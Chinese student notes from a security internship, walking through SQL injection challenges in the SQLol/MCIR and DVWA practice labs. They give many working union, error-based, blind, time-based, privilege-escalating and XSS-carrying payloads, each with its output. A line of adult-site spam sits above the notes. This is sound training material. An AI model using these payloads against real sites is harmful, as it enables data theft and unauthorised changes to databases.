日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

ncist网络空间安全专业护网方向认知实习笔记2021.12 DAY7

發布時間:2023/12/20 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ncist网络空间安全专业护网方向认知实习笔记2021.12 DAY7 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

滲透測試之SQL注入

  • 由于第六天學到的東西主要還是復習HTTP協議以及一些網絡請求方式(主要是GET和POST),沒啥東西,多抓抓包,誰都能學會,我就不在筆記里邊寫了。今天的才是大頭!!!!
  • 今天的筆記里邊重點記錄以下今天開的新篇(重點!):SQL注入

寫在前邊,如果在后邊的SQL注入示例中出現了多種注入方法的出現,那么第一個就是老師給的標準案例,后邊的就是我個人根據理解自己寫的,都是可以的

SQL注入

什么是SQL注入?

(啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊阿西吧一堆官方套話,我在這兒就說人話了(bushi))

個人理解:一種聽過想網站內惡意傳入某種參數導致連接數據庫并訪問的時候出現問題,導致出現一些攻擊者出現的東西。比如:

-- 這是正常情況下的SQL語句,其中的$id表示的是需要查詢的信息id -- 正常的id emmmmm 就很正常 SELECT * FROM TABLEname WHERE `id` = '{$id}'; -- 但是如果$id的值為 ' or 1=1;# 呢? -- 來看一下完整的sql語句吧 SELECT * FROM TABLEname WHERE `id` = '' or 1=1;#'; -- 懂我意思了沒,這種操作,叫做永真式簡單注入,后邊還會說

一些分類

  • 簡單注入(simple SQL injection)
    • 永真式:最后加入 or 1=1 來保證無論如何都能正常獲得數據
    • 錯誤語句:估計修改使得Web服務器在調用SQL語句的時候出現報錯,從而判斷數據庫類型或者其他信息
    • 結束注釋:在其中混入注釋符注釋掉部分語句
    • 聯合查詢:使用 union all ,后邊就可以寫上我們真正需要的語句
  • 盲注(Blind SQL injection)
    • 一般我們可以根據返回數據獲取我們想要的信息。
    • 但一些頁面,我們是獲取不到詳細信息。信息只有正確或不正確。
  • 注入測試的一些例子

    測試環境:DVWA

    • 簡單注入:
    1' and 1=1;# -- 判斷是否可以注入1' or 1=1;# -- 嘗試獲取數據表全部信息1' union all select 1,2;# -- 來判斷可以獲取的參數個數1' union all select 1,(@@version);# -- 來獲取數據庫版本1' union all select 1,(database());# -- 來獲取數據庫名稱1' union all select 1,group_concat(column_name) from information_schema.columns where table_name='users';#-- 獲取表所有列名

    MCIR-master環境的搭建

  • 首先解壓縮素材文件到服務器根目錄下(這邊在Win11操作系統下使用phpstudy搭建環境)

  • 打開根目錄,進入目錄 \MCIR-master\sqlol\includes 下

  • 打開下邊的這個文件(記事本或者其他文本編輯器打開就行,我用的sublime)

  • 其中有一段文本默認是這樣的:

  • 將其中的server(服務器IP,用本機的即可)、server(服務器IP,用本機的即可)、serverIPport(MySQL開放的端口號,默認3306,當然多開的話可能也會有端口不一樣的)、$password(root密碼)改成你本機的實際信息即可。
  • 進入php.ini文件(具體怎么進入的請百度。如果是phpstudy的話則直接在安裝目錄下找就可以了,比如說我本人的路徑就是:

    F:\phpstudy_pro\Extensions\php\php7.3.4nts\php.ini)
  • 確保以下屬性被修改
  • allow_url_fopen=On allow_url_include=On
  • 打開任意瀏覽器,輸入以下URL鏈接 http://127.0.0.1/MCIR-master/
  • 界面如下:
  • 點擊左下角的SQLol界面,進入如下界面則SQL注入實驗可以正常進行
  • 點擊正中間的“RESET按鈕”,此時檢查對應的數據庫,則會將數據庫創建好
    • 截止到現在,MCIR-master靶場環境配置成功

    幾道題的寫法

    點一下Challenges,會出來14道題

    好了接下來就開始一道一道地搞了(說英語不好的,都給我憋著…IT界的人憑實力瞎蒙(bushi))

    Challenge 0 - Hello, world!

    差不多就這么個意思

    • 要求:輸入點可以查詢用戶名是否存在。使用SQL注入遍歷所有用戶
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型 - GET
    • 過濾 - None
    • 輸出–所有用戶,錯誤語句,查詢語句

    注入就行

    'or 1=1:#

    然后下邊寫的很清晰嘛,這么一折騰,最后服務器得到的SQL語句是醬紫的:

    SELECT username FROM users WHERE username = ''or 1=1;#' GROUP BY username ORDER BY username ASC

    結果如下:

    Array ( [username] => Herp Derper ) Array ( [username] => SlapdeBack LovedeFace ) Array ( [username] => Wengdack Slobdegoob ) Array ( [username] => Chunk MacRunfast ) Array ( [username] => Peter Weiner )

    可見全部結果都已經回顯了出來。

    Challenge 1 - SQL Injection 101

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型- GET
    • 過濾 - None
    • 輸出 - 所有用戶,錯誤語句,查詢語句

    這邊得分以下幾步:

    1.查找數據庫

    注入

    -- type 1 'and 1=2 union select concat_ws(char(32,58,32),user(),database(),version());# -- type 2 'and 1=2 union select concat_ws('-',user(),database(),version());#

    SQL語句變成了:

    -- 1. SELECT username FROM users WHERE username = ''and 1=2 union select concat_ws(char(32,58,32),user(),database(),version());#' GROUP BY username ORDER BY username ASC -- 2. SELECT username FROM users WHERE username = ''and 1=2 union select concat_ws('-',user(),database(),version());#' GROUP BY username ORDER BY username ASC

    返回結果:

    -- 1. Array ( [username] => root@localhost : sqlol : 5.7.26 ) -- 2. Array ( [username] => root@localhost-sqlol-5.7.26 ) - 在這上邊先加上了and 1=2則是直接否定了前邊的sql語句,因為結果必錯(事實證明,如果用 or 1=1 也是可以的,那樣的話sql就應該注入下邊這個,但是回顯會很多:) 'or 1=1 union select concat_ws('-',user(),database(),version());#
    • 這邊解釋一下幾個MySQL函數
    • concat_ws
      • 表示的意思是查詢第二個及其后邊的所有內容,并用第一個字符串參數進行分割
      • 例如在這里的,就是查找用戶名、數據庫名、MySQL版本號并放在同一格中輸出
      • 但是老師使用的是" : ",直接從ASCII表看看32、58、32對應的內容是什么就知道了(空格+冒號+空格)
      • 我用的就是直接的字符串"-"
    • user() 的返回值是當前正在使用的用戶名
    • database() 的返回值是當前已經選定的數據庫(php在連接數據庫的時候都已經制定了一個數據庫,等價于命令行中的:use database_name)
    • version() 的返回值是當前mysql的版本號
    2.查找數據表

    根據上一步已經了解到了所用數據庫的數據庫名為"sqlol"

    注入:

    ' and 1=2 union all select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol';#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol';#' GROUP BY username ORDER BY username ASC

    回顯:

    Array ( [username] => ssn ) Array ( [username] => users )
    • 這邊講幾個東西
    • MySQL 中的 information_schema 數據庫
    • - 太多了,反正是存儲了一大堆和整個數據庫中的數據表有關系的視圖,這里邊提到的TABLES表存儲的則有數據庫及其存儲對應表的關系 - 可以以下博客詳解: - [https://blog.csdn.net/kikajack/article/details/80065753](https://blog.csdn.net/kikajack/article/details/80065753)
    • 在初次運行的時候,報了如下的錯誤:(欸等一下,我是不是想到了一種防止sql注入的方法????)
    • - Illegal mix of collations for operation 'UNION' - 初步原因是字符串編碼的問題,我最終的解決方法是將users表中的username字段的編碼方式改成了和information_schema的編碼統一的utf8_general_ci,反正個人理解就是:聯合查詢的情況下,成立的起碼條件就是兩邊數據表的編碼格式需要保持一致 - 可以參見以下博客:(ps:有條件的話用navicat改就行,用不著像這兩篇里那樣) - [https://blog.csdn.net/kikajack/article/details/80065753](https://blog.csdn.net/kikajack/article/details/80065753) - [https://blog.csdn.net/u011250160/article/details/114727359](https://blog.csdn.net/u011250160/article/details/114727359)
    3.查找列

    根據上邊的查找內容已經可以確定目標數據表的表名為ssn,所以接下來我們需要查找所需要的具體列的列名

    注入:

    ' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn';#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn';#' GROUP BY username ORDER BY username ASC

    回顯:

    Array ( [username] => name ) Array ( [username] => ssn )
    • information_schema.COLUMNS表中存儲的是列名和數據表之間的對應關系
    4.最后一步:查找目標結果

    根據上邊的幾步,可以了解到目標數據庫名叫sqlol,數據表名叫ssn,目標列名有name和ssn

    根據上邊的這些信息,可以直接注入了

    注入:

    -- type 1 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn;# -- type 2 'and 1=2 union all select concat_ws(' - ',`name`,ssn) from sqlol.ssn;#

    SQL語句變成了:

    -- 1. SELECT username FROM users WHERE username = ''and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn;#' GROUP BY username ORDER BY username ASC -- 2. SELECT username FROM users WHERE username = ''and 1=2 union all select concat_ws(' - ',`name`,ssn) from sqlol.ssn;#' GROUP BY username ORDER BY username ASC

    回顯(這結果,不就好起來了嗎?):

    -- 1. Array ( [username] => Herp Derper : 012-34-5678 ) Array ( [username] => SlapdeBack LovedeFace : 999-99-9999 ) Array ( [username] => Wengdack Slobdegoob : 000-00-1112 ) Array ( [username] => Chunk MacRunfast : 666-67-6776 ) Array ( [username] => Peter Weiner : 111-22-3333 ) -- 2. Array ( [username] => Herp Derper - 012-34-5678 ) Array ( [username] => SlapdeBack LovedeFace - 999-99-9999 ) Array ( [username] => Wengdack Slobdegoob - 000-00-1112 ) Array ( [username] => Chunk MacRunfast - 666-67-6776 ) Array ( [username] => Peter Weiner - 111-22-3333 )
    Challenge 2 - The Failure of Quote Filters

    • 要求:找到社會安全碼表,顯示內容
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:GET
    • 過濾 - 單引號過濾
    • 輸出 - 所有結果,錯誤語句,查詢語句

    這邊就不給翻譯了哈,這邊的內容和上一道題重復度很高,唯一的區別就在于原有sql語句的不同。上一道題的sql語句中間有單引號但是這里沒有,所以重復上一道題的步驟但是把注入的語句中的最開頭的單引號刪掉就可以了。沒啥需要注意的【啊我呸】。

    仔細看了一遍,更改一下上邊的說法,這里邊設計了單引號過濾——Single quotes removed(上邊寫的清清楚楚的),所以concat_ws調用的第一個參數必須用char拼接字符串的形式而不能直接用懂我意思了么!!

    Challenge 3 - Death Row

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 一次一行,錯誤語句,無查詢語句

    分為以下幾步:

    1.查找數據庫(從這兒開始我也懶得分我的和老師的來了,經過上一次的錯誤,這里的都統一了,我都開始按照老師的寫了)

    注入:

    'and 1=2 union select concat_ws(char(32,58,32),user(),database(),version());#

    SQL語句變成了:

    SELECT username FROM users WHERE username = ''and 1=2 union select concat_ws(char(32,58,32),user(),database(),version());#' GROUP BY username ORDER BY username ASC

    返回結果:

    Array ( [username] => root@localhost : sqlol : 5.7.26 )
    2.查找數據表

    從上一步了解到數據庫名字叫做sqlol

    所以現在找數據表

    注入:

    ' and 1=2 union all select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol';#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol';#' GROUP BY username ORDER BY username ASC

    回顯(這玩意兒要是找不到對的就在上邊增加篩選條件然后重新刷):

    Array ( [username] => ssn )
    3.查找列

    從上邊了解到目標數據表表名為ssn,繼續

    注入

    ' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn';#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn';#' GROUP BY username ORDER BY username ASC

    回顯:

    Array ( [username] => name )

    emmmmm,這玩意兒他夠嗎?不夠,再來!!!

    注入

    ' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 1,3;#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 1,3;#' GROUP BY username ORDER BY username ASC

    回顯:

    Array ( [username] => ssn )

    emmmmm這樣就差不多了,接著看看有沒有別的列(雖然已經知道了(bushi))

    注入

    ' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 2;#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' and 1=2 union all select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 2,4;#' GROUP BY username ORDER BY username ASC

    回顯:

    好了,回顯為空就說明只有兩個列了,一個叫name,一個叫ssn

    4.最后一步:查找目標結果

    注入:

    'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 0,1;#

    在這兒我就不多說了,一步一步都出來,直接放注入用的東西了。算上上邊的一共有:

    'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 0,10;# 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 1,10;# 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 2,10;# 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 3,10;# 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 4,10;# 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 5,10;# -- 到最后這一行回顯就為空了,就到頭了 -- 這個是老師用的,我還略有迷惑emmmm 'and 1=2 union all select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 1 offset 1;#
    Challenge 4 - War on Error

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容。查詢結果不能顯示,需要構造語句到錯誤顯示處。
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 沒有返回結果,錯誤語句,無查詢語句

    看到這個”沒有返回結果“的時候虎軀一震,但后來仔細想想大部分的sql實戰注入不都是不報錯也都沒有回顯的嗎?那就來試試√

    參考著老師給的步驟先研究研究(還是經典四個步驟)

    1.查找數據庫

    注入:

    'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and '1'='1

    SQL語句變成了:

    SELECT username FROM users WHERE username = ''and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and '1'='1' GROUP BY username ORDER BY username ASC

    返回服務器報錯

    XPATH syntax error: '~root@localhost : sqlol'
    • 嘶~~~~在這兒碎碎念下::::妙蛙:::::妙蛙::::::
    • 嘶~~~~我去查一下這幾個函數干毛用的【doge】
      • 咳咳,敲黑板劃重點[doge]
      • 在之前提到過的concat_ws方法在這里就不再講解了,如果還想看的話,就看一下Challenge 1 里邊的第一步——查找數據庫,我在那里進行了一定的解釋
      • concat函數
        • 將查到的字符串直接拼接,相當于concat_wx("",字符1,字符2…)
        • 在這邊輔助了下邊的錯誤報錯
      • extractvalue函數
        • 妙蛙~~~~~~~~~~~
        • 怎么講呢,雖然但是,查到的東西一大半都是講的這玩意兒的報錯注入的用法,離譜的一批,就感覺這玩意兒就像是為了SQL注入而生的嗎[笑哭]
        • 下邊這一段是一段非常正經的extractvalue函數的使用方法。
    /* extractvalue():從目標XML中返回包含所查詢值的字符串。EXTRACTVALUE (XML_document, XPath_string);第一個參數:XML_document是String格式,為XML文檔對象的名稱第二個參數:XPath_string (Xpath格式的字符串) */ SELECT extractValue('<a href="sss"></a><a href="2333"></a>','/a/attribute::href') body FROM `casexml`
    • 大概先知道這些吧,然后這里邊有一個方法專門用于報錯注入使用。如下:
    例如:SELECT ExtractValue('<a><b><b/></a>', '/a/b'); 就是尋找前一段xml文檔內容中的a節點下的b節點,這里如果Xpath格式語法書寫錯誤的話,就會報錯。這里就是利用這個特性來獲得我們想要知道的內容。 -- 注入語句可以這樣寫: and extractvalue(null,concat(0x7e,(代碼操作),0x7e)) -- 把所需要查詢出來的信息放在上邊這個例子中的“代碼操作”里邊就行

    • 以上內容鏈接來源:https://blog.csdn.net/weixin_46706771/article/details/112768348
    • 劃重點!!!
    • 用concat在代碼操作的前后分別添加了添加了0x7e然后導致的xml讀取相對路徑錯誤,從而導致報錯,但是又能輸出一部分結果
    • 我特么直呼好家伙。
    • 下邊的按照之前的思路往上套也就都能套出來了
    2.查找數據表

    從上一步了解到數據庫名字叫做sqlol

    所以現在找數據表

    注入:

    'and (extractvalue(1,concat(0x7e,( select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol')))) and '1'='1

    SQL語句變成了:

    SELECT username FROM users WHERE username = ''and (extractvalue(1,concat(0x7e,( select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol')))) and '1'='1' GROUP BY username ORDER BY username ASC;

    服務器報錯回顯:

    Subquery returns more than 1 row

    emmmmmm好像并沒有什么卵用

    這時候就應該參考上一道題所提到的“單行回顯”了。加上limit就好。

    重來!!!!!!!!!!

    注入:

    'and (extractvalue(1,concat(0x7e,( select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol' limit 0,1)))) and '1'='1

    服務器報錯回顯:

    XPATH syntax error: '~ssn'

    注入:

    'and (extractvalue(1,concat(0x7e,( select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol' limit 1,1)))) and '1'='1

    服務器報錯回顯:

    XPATH syntax error: '~users'

    注入:

    'and (extractvalue(1,concat(0x7e,( select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol' limit 2,2)))) and '1'='1

    服務器報錯回顯:

    Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

    這一段自己分析自己品,然后自己寫出來,那感覺太爽了

    3.查找列

    廢話不多說,跟上邊的差不多,直接開干!!

    注入:

    'and (extractvalue(1,concat(0x7e,( select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 0,1)))) and '1'='1

    服務器報錯回顯:

    XPATH syntax error: '~name'

    注入:

    'and (extractvalue(1,concat(0x7e,( select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 1,1)))) and '1'='1

    服務器報錯回顯:

    XPATH syntax error: '~ssn'

    注入:

    'and (extractvalue(1,concat(0x7e,( select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn' limit 2,2)))) and '1'='1

    服務器報錯回顯:

    4.最后一步:查找目標結果(沖他丫的勝利就在眼前!!!!!!!)

    注入:

    'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 0,1)))) and '1'='1

    服務器報錯回顯:

    XPATH syntax error: '~Herp Derper : 012-34-5678'

    以此類推

    'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 0,1)))) and '1'='1 'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 1,1)))) and '1'='1 'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 2,2)))) and '1'='1 'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 3,3)))) and '1'='1 'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 4,4)))) and '1'='1 'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn limit 5,5)))) and '1'='1

    然后這不就好起來了嗎?問題解決

    Challenge 5 - Blind Luck

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容。盲注。
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 返回語句只有真假,沒有錯誤語句,無查詢語句
  • 怎么講呢,都玩到這兒了還能有啥辦法呀?盲注!
  • 參考下老師給的方法。注入:
  • ' or ascii(substring((select user()),1,1))=111#
  • .無回顯,證明用戶名第一位不是o(ascii對應的是111)
  • 那就接著找唄,一個一個試,最終確認第一位的值是114(對應字符r)
  • 好很有精神,接下來檢索下一個
  • 這樣子人工來檢查是不是太慢了?那就借助工具吧。在這兒就不展示了
  • Challenge 6 - Stack the Deck

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容。
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 有返回結果,有錯誤語句,無查詢語句

    老套路,錯誤注入就行

    注入:

    'or updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#

    SQL語句變成了:

    SELECT username FROM users WHERE username = ''or updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#' GROUP BY username ORDER BY username ASC

    服務器錯誤回顯:

    XPATH syntax error: 'Herp Derper : : 012-34-5678'
    • 這邊用到的updatexml函數,就講一下吧(老師在PPT里給出的一種方法,不失為一種可行的錯誤注入的方法)
    select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1 -- skr~~~差不多就這么個意思,類型很想,自己體會去
    Challenge 7 - Walking on Thin Ice

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容。DELETE注入(不小心刪除的話就按網頁上的RESET還原)
    • 語句類型 - DELETE
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 沒有返回結果,有錯誤語句,無查詢語句

    有一說一,老套路了,用我們的老朋友:報錯查詢

    注入:

    'or updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#

    SQL語句變成了:

    DELETE FROM users WHERE username = ''or updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#'

    服務器報錯回顯:

    XPATH syntax error: 'Herp Derper : : 012-34-5678'

    報錯注入yyds!!!

    Challenge 8 - Black Comedy

    差不多就這么個意思

    • 要求:找到社會安全碼表,顯示內容。
    • 語句類型 - SELECT
    • 注入類型 - where語句注入
    • 訪問類型:POST
    • 過濾 - union,select,where,and,–,#
    • 輸出 - 返回結果, 錯誤語句,查詢語句

    既然這里過濾了union和select等,那我們就玩一波大小寫混淆√

    注入:

    'aNd 1=2 uNiOn all SeLEct concat_ws(char(32,58,32),`name`,ssn) from sqlol.ssn;#

    然后就…翻車了

    差點忘了 # 這樣的注釋符也被注釋掉了

    那么就這樣

    注入:

    'uNiOn SeLEct concat(`name`,char(32,58,32),ssn) from sqlol.ssn uNion seLeCt null from users whEre username='

    SQL語句變成了:

    SELECT username FROM users WHERE username = ''uNiOn SeLEct concat(`name`,char(32,58,32),ssn) from sqlol.ssn uNion seLeCt null from users whEre username='' GROUP BY username ORDER BY username ASC

    成功得到回顯:

    Array ( [username] => Chunk MacRunfast : 666-67-6776 ) Array ( [username] => Herp Derper : 012-34-5678 ) Array ( [username] => Peter Weiner : 111-22-3333 ) Array ( [username] => SlapdeBack LovedeFace : 999-99-9999 ) Array ( [username] => Wengdack Slobdegoob : 000-00-1112 )
    • 這邊給到的是一些關鍵字符被過濾情況下的方法:大小寫混淆
    Challenge 9 - Administrative Tasks

    差不多就這么個意思

    • 要求:插入到查詢中,使其將id為3的用戶的“isadmin”字段更新為1。
    • 語句類型 - UPDATE
    • 注入類型 - 需要寫入的值
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 通用錯誤信息,查詢顯示

    注入:

    -- 這個是老師給的,注入之后會使得整個username都被改掉,我認為因該添加一個聯合查詢 admin',isadmin=1 where id=3;# -- 這是我改進的emmmmm算了還是用老師的吧 slect username from users where id=3',isadmin=1 where id=3;#

    插入之后的SQL語句:

    UPDATE users SET username = 'admin',isadmin=1 where id=3;#' WHERE isadmin = 0 UPDATE users SET username = 'slect username from users where id=3',isadmin=1 where id=3;#' WHERE isadmin = 0

    無回顯,下邊的上圖是插入前的數據表,下圖使用上邊的方法插入后的數據表

    Challenge 10 - No WHERE

    差不多就這么個意思

    • 要求::從數據庫中獲得社會安全號碼。
    • 語句類型 - SELECT
    • 注入類型 - 列名
    • 訪問類型:GET
    • 過濾 - None
    • 輸出 - 無錯誤信息,查詢顯示

    在這邊我就一步一步具體展示了哈

    1.查找數據庫

    注入:

    concat_ws(' - ',user(),database())

    SQL語句變成了:

    SELECT concat_ws(' - ',user(),database()) FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

    服務器回顯:

    Array ( [concat_ws(' - ',user(),database())] => root@localhost - sqlol ) Array ( [concat_ws(' - ',user(),database())] => root@localhost - sqlol ) Array ( [concat_ws(' - ',user(),database())] => root@localhost - sqlol )

    好了,了解到了數據庫名叫sqlol

    2.查找數據表

    注入:

    TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol'#

    SQL語句變成了:

    SELECT TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='sqlol'# FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

    順利得到回顯:

    Array ( [TABLE_NAME] => ssn ) Array ( [TABLE_NAME] => users )

    ssn這個目標數據表不就拿到了嗎?

    3.查找列

    注入

    COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn'#

    SQL語句變成了:

    SELECT COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='ssn'# FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

    順利得到回顯:

    Array ( [COLUMN_NAME] => name ) Array ( [COLUMN_NAME] => ssn )

    列名:name和ssn

    4.查找目標數據

    注入

    concat(name,' :: ',ssn) from ssn#

    SQL語句變成了:

    SELECT concat(name,' :: ',ssn) from ssn# FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

    順利得到回顯:

    Array ( [concat(name,' :: ',ssn)] => Herp Derper :: 012-34-5678 ) Array ( [concat(name,' :: ',ssn)] => SlapdeBack LovedeFace :: 999-99-9999 ) Array ( [concat(name,' :: ',ssn)] => Wengdack Slobdegoob :: 000-00-1112 ) Array ( [concat(name,' :: ',ssn)] => Chunk MacRunfast :: 666-67-6776 ) Array ( [concat(name,' :: ',ssn)] => Peter Weiner :: 111-22-3333 )

    好起來了(good!)

    Challenge 11 - No WHERE 2

    差不多就這么個意思

    • 要求::從數據庫中獲得社會安全號碼。
    • 語句類型 - SELECT
    • 注入類型 - 列名(向 ORDER BY 字句中插入)
    • 訪問類型:GET
    • 過濾 - None
    • 輸出 - 無錯誤信息,查詢顯示

    注入:

    if(1=2,1,sleep(5))#

    有延遲,證明這里可以注入

    重新編輯再注入:

    1 and updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)# -- if(1=2,1,select concat(`name`,' :: ',ssn) from sqlol.ssn)# -- 折騰了半天還得是報錯注入呀

    Navicat一試就成功了,放在靶場里才想起來無報錯顯示…

    wnm…再來!!!

    • 先卡著…等會兒再看
    Challenge 12 - XSSQLi

    差不多就這么個意思

    • 數據庫的內容通常被認為是可信的。一些大規模攻擊者利用這一事實,并發起大規模SQL注入攻擊,不僅竊取數據庫的內容但也<script>標記指向惡意Javascript在數據庫的所有行希望他們將提交給用戶的網站。
    • 您的目標是使用SQL注入缺陷來執行反映的跨站點腳本攻擊。
    • 要求::從數據庫中獲得社會安全號碼。
    • 語句類型 - SELECT
    • 注入類型 - WHERE字句中的字符串值
    • 訪問類型:POST
    • 過濾 - None
    • 輸出 - 一行結果、詳細錯誤消息、查詢結果不顯示

    注入:

    ' union select '<script>alert(\'you are hacked by me\')</script>';#

    SQL語句變成了:

    SELECT username FROM users WHERE username = '' union select '<script>alert(\'you are hacked by me\')</script>';#' GROUP BY username ORDER BY username ASC

    這時候注入之后就會發現,沒有出現回顯,但是在網頁的前端出現了一段js源碼,在這里我們只是讓網頁彈出了一段警告框,但是如果我們插入的東西再多一點,是不是就可以獲取更多的東西了?

    這段好像XSS注入呀…

    Challenge 13 - LIKE OMG

    差不多就這么個意思

    • LIKE關鍵字的操作類似于SQL數據庫中的相等操作符“=”。不同之處在于允許通配符。在這個挑戰中,開發人員使用了“LIKE”關鍵字而不是相等操作符。
    • 您的目標是從數據庫中檢索所有用戶名。
    • 要求::從數據庫中獲得社會安全號碼。
    • 語句類型 - SELECT
    • 注入類型 - WHERE字句中的字符串值
    • 訪問類型:POST
    • 過濾 - 單引號過濾
    • 輸出 - 布爾值、查詢結果不顯示、無報錯信息

    需要使用python編程和sqlmap工具,在準備好之后再回來更~~~

    Challenge 13 - Now you have two problems

    差不多就這么個意思

    • 通常情況下,如果你有一個問題,你試著用正則表達式來解決,你現在有兩個問題。在這個挑戰中,您必須避開以正則表達式實現的白名單過濾器。
    • 您的目標是從數據庫中檢索社會安全數字。
    • 語句類型 - SELECT
    • 注入類型 - WHERE字句中的字符串值
    • 訪問類型:POST
    • 過濾 - 白名單、正則表達式

    – 開發中…

    題目小結

  • 第零題是很簡單的 'or 1=1;# 永真式注入,直接輸出表中所有內容,一句話帶過
  • 第一題是一道中規中矩的常規SQL注入。首先通過database()函數查找到了當前的數據庫名;然后通過information_schema.TABLES數據表中的TABLE_SCHEMA列查找到了目標的可能數據表表名;最后通過information_schema.COLUMNS數據表中的TABLES_NAME屬性查找到了目標的列名;當目標的數據庫名、表名、列名都了解到的時候,目標內容怎么查找?就很簡單了
  • 相較于第一題,第二題添加了單引號過濾的機制,但是無傷大雅,直接放上0或1,后邊的照常就能出結果了
